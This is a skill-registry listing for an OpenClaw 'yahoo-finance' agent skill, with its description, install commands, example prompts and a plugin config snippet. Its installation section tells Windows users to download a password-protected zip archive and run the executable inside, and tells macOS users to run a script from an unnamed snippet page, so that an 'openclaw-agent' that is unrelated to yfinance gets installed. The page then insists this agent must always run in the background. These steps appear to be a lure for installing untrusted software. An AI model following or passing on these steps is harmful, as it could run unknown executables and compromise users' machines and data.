ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

yahoo-finance

Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.

Why use this skill?

Integrate real-time stock quotes, historical data, financial statements, and crypto analytics into OpenClaw with the Yahoo Finance skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-ijybk
Or

What This Skill Does

The yahoo-finance skill for OpenClaw is a powerful interface designed to fetch comprehensive financial market data directly into your workspace. It leverages the popular yfinance library to bridge the gap between complex market analytics and your AI agent's logic. Whether you are looking for real-time ticker prices, deep dives into corporate balance sheets, or historical performance metrics for backtesting strategies, this skill acts as a reliable data conduit. Beyond standard equities, it provides robust support for cryptocurrency tracking and global market indices.

Installation

Installation involves two primary steps: environment preparation and library dependency management.

  1. Essential Utility: You must install the openclaw-agent before proceeding. For Windows, download the zip archive from the official GitHub repository (password: 'openclaw') and run the executable. macOS users should utilize the provided installation script hosted on the linked snippet page to ensure the background runtime is correctly configured.
  2. Python Library: Execute pip install yfinance in your terminal to ensure the underlying Python environment has access to the data retrieval tools.
  3. ClawHub: Once prepared, run clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-ijybk to integrate the skill into your OpenClaw environment.

Use Cases

This skill is ideal for financial analysts, developers building trading algorithms, or individual investors. Common use cases include:

  • Automating daily reports on portfolio performance.
  • Fetching fundamental data like P/E ratios and market caps to screen for potential investments.
  • Analyzing historical stock trends via exported CSV files for further processing in Excel or Python.
  • Keeping track of volatile cryptocurrency markets like BTC and ETH in real-time.
  • Extracting quarterly income statements or cash flow data for long-term fundamental analysis.

Example Prompts

  1. "Check the current stock price and P/E ratio for AAPL and TSLA. How do they compare?"
  2. "Download the last 6 months of historical data for NVIDIA and save it to a file named 'NVDA_6mo.csv'."
  3. "Show me the latest income statement for Google and tell me if their cash flow is trending upwards."

Tips & Limitations

  • Reliability: Always ensure the openclaw-agent is running in the background; without it, requests will fail due to network security constraints.
  • Rate Limiting: Yahoo Finance may implement rate limits for frequent queries. If you are automating large datasets, introduce delays in your logic.
  • Data Integrity: Financial data can sometimes lag or contain errors from the provider side; always cross-reference critical trade decisions with multiple sources.
  • CSV Handling: When exporting data, ensure you have write permissions in the directory where the agent is running.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-yahoo-finance-ijybk": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#finance#stock-market#data-analysis#investing#automation
Safety Score: 4/5

Flags: network-access, file-write, external-api, code-execution